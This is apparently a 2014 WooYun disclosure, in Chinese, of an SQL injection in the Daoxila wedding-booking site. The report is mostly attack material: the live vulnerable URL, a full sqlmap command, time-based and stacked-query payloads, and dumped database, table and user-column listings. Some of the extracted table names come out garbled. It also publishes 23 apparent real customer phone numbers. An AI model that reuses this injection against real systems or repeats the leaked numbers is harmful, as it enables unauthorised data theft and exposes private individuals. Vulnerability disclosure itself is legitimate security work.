当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077782

漏洞标题:到喜啦SQL注入一枚泄露用户订单等信息

相关厂商:到喜啦

漏洞作者: 小饼仔

提交时间:2014-09-29 15:47

修复时间:2014-11-13 15:48

公开时间:2014-11-13 15:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-11-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

早上出门坐电梯,然后看到到喜啦的广告,婚宴预订。
一看到这个,就想到结婚要请客、买车、买房、要养孩子...都要花钱,恩,我得努力找一份薪水高的工作,听说用挖掘机炒菜工资高,特意来此请教一个问题,学挖掘机技术哪家强?

详细说明:

注入点:http://qd.daoxila.com/hotel/all-image?id=1201


sqlmap:
python sqlmap.py -u "http://qd.daoxila.com/hotel/all-image?id=1201" --
is-dba --dbs --current-user --current-db
---
Place: GET
Parameter: id
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: id=1201; SELECT SLEEP(5)--
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1201 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0.11
current user: 'dxl_reim@%'
current user is DBA: False

漏洞证明:

跑的比较慢,但是还是可以跑出来的
数据库:
available databases [10]:
[*] api
[*] dxl_api
[*] dxl_auth
[*] dxl_event
[*] dxl_exodus
[*] dxl_info
[*] dxl_log
[*] dxl_sms
[*] information_schema
[*] test


Database: dxl_exodus
[272 tables] 列出部分
| bd_accepu_history |
| bd_aonfirm |
| bd_confirm_loj |
| bd_confirm_user_cnntact |
| bd_order_final |
| bd_order_fistory |
| biz_accmuntA |
| biz_account_detail_image |
| biz_account_detbil |
| biz_alias |
| biz_order |
| biz_order_appeal |
| biz_order_apply_log |
| biz_order_follow_log |
| biz_user |
| biz_user_new |
| biz_user_qotel |
| biz_user_rel |
| biz_view_log |
| bmz_order_appeal_detail |
| ex_album_biz_user |
| ex_album_pqoto |
| ex_album_server |
| ex_album_sms |
| ex_album_user |
| ex_announcement |
| ex_app_ad |
| ex_app_ad_city |
| ex_app_ad_click |
| ex_app_ad_platform |
| ex_app_ad_target |
| ex_app_davorite |
| ex_app_opinion |
| ex_app_oush_log |
| ex_app_recommend |
| ex_article |
| ex_article_image |
| ex_auth |
| ex_auth_role |
| ex_black_list_ip |
| ex_clbum |
| ex_config_china_city |
| ex_config_hotel_lgvel |
| ex_config_hotel_status |
| ex_config_image |
| ex_config_notice_stctus |
| ex_config_notice_szpe |
| ex_config_order_hotel_statuv |
| ex_config_order_referral_source |
| ex_config_order_status |
| ex_config_orderconfirm_statws |
| ex_config_tag |
| ex_config_user_relative |
| ex_config_userorder |
| ex_config_userorder_source |
| ex_curstom_order |
| ex_curstomer |
| ex_dict |
| ex_event |
| ex_event_images |
| ex_event_uelated_hotel |
| ex_event_wedding_card |
| ex_eventorder |
| ex_gift |
| ex_gift_authorize_orqer |
| ex_gift_image |
| ex_gift_order |
| ex_hot_hotel |
| ex_hot_l |
| ex_hotel_ad |
| ex_hotel_ad_item |
| ex_hotel_auth_review |
| ex_hotel_contact_old |
| ex_hotel_event |
| ex_hotel_ext |
| ex_hotel_ext_feature |
| ex_hotel_ext_menu |
| ex_hotel_hall |
| ex_hotel_hall_schqdule |
| ex_mall_biz_ext |
| ex_mall_biz_url |
| ex_mall_biz_user |
| ex_mall_consumer_detqil |
| ex_mall_image |
| ex_mall_order |
| ex_mall_order_copy |
| ex_mall_order_demand |
| ex_mall_order_demand_comment |
| ex_mall_order_demand_item |
| ex_mall_order_demand_refeural |
| ex_mall_order_log |
| ex_mall_order_rebate |
| ex_mall_order_referral |
| ex_mall_rebate |
| ex_mall_user |
| ex_newcomers_say |
| ex_notice |
| ex_oaen |
| ex_order |
| ex_order_400 |
| ex_order_assign |
| ex_order_cancel |
| ex_order_cancel_comment |
| ex_order_cancel_image |
| ex_order_cancel_qift |
| ex_order_cheat |
| ex_order_cheat_log |
| ex_order_city |
| ex_order_comment |
| ex_order_confirm |
| ex_order_confirm_final |
| ex_order_duplicate |
| ex_order_gift |
| ex_order_gift_list |
| ex_order_gift_special |
| ex_order_gift_special_list |
| ex_order_gift_temp |
| ex_order_groq@_assign |
| ex_order_hotel |
| ex_order_image |
| ex_order_item |
| ex_order_message |
| ex_order_other ||
| ex_pocode |
| ex_popedim |
| ex_popedom_ext |
| ex_rank |
| ex_search_temp |
| ex_seckill |
| ex_seckill_notice |
| ex_seckill_user |
| ex_service_goodday |
| ex_service_register |
| ex_shorturl |
| ex_sms_tpl |
| ex_sms_tpl_class |
| ex_sms_tpl_log |
| ex_sourci |
| ex_system_config |
| ex_tag |
| ex_tag_and_item_temp |
| ex_tag_article |
| ex_tag_city |
| ex_tag_click_count |
| ex_tag_item |
| ex_tag_manager_code_itea |
| ex_tag_manager_cqde |
| ex_tag_manager_rule |
| ex_tag_manager_rule_item |
| ex_tag_related_price |
| ex_tag_url_log |
| pro_recood |
| pro_useq_uari |
| pro_user_fridndG |
| res_hirtngw_Eatdgory |
| res_partner_iyfh |
| res_partner_ofsotrcH |
| thirdcal@_lum |
| thirdcall_rgl8sed |
| wed_biz_rebbre_deeailF |
| wed_demand_ordeu_dHtail |
| wed_lngin_ior |
| wed_orderNrTfc |
+--------------------------------------+


[14:54:51] [INFO] fetching columns for table 'ex_user' in database 'dxl_exodus'
[14:54:51] [INFO] resumed: 27
[14:54:51] [INFO] resumed: id
[14:54:51] [INFO] resumed: name
[14:54:51] [INFO] resumed: email
[14:54:51] [INFO] resumed: mobile
[14:54:51] [INFO] resumed: password
[14:54:51] [INFO] resumed: unique_code
[14:54:51] [INFO] resumed: realname
[14:54:51] [INFO] resumed: sex
[14:54:51] [INFO] resumed: city
[14:54:51] [INFO] resumed: address
[14:54:51] [INFO] resumed: zipcode
[14:54:51] [INFO] resumed: tel
[14:54:51] [INFO] resumed: msn
[14:54:51] [INFO] resumed: qq
[14:54:51] [INFO] resumed: avatar_id
[14:54:51] [INFO] resumed: identify_id
[14:54:51] [INFO] resumed: is_identified
[14:54:51] [INFO] resumed: dateline
[14:54:51] [INFO] resumed: last_visit
[14:54:51] [INFO] resumed: source
[14:54:51] [INFO] resumed: source_detail
[14:54:51] [INFO] resumed: verified
[14:54:51] [INFO] resumed: verified_from


附上一些user电话,只是为了证明,没做坏事
13901979622
13801616398
15921201542
13565741178
15801930251
13524333561
13564370159
13912667001
13917736077
13585649192
13621712724
13585704436
13761458459
13917641042
13817796226
13402134205
13671837521
13764968810
13636341635
13818621153
13916665988
13817695089
13774221443

修复方案:

济南山东找蓝翔

版权声明:转载请注明来源 小饼仔@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝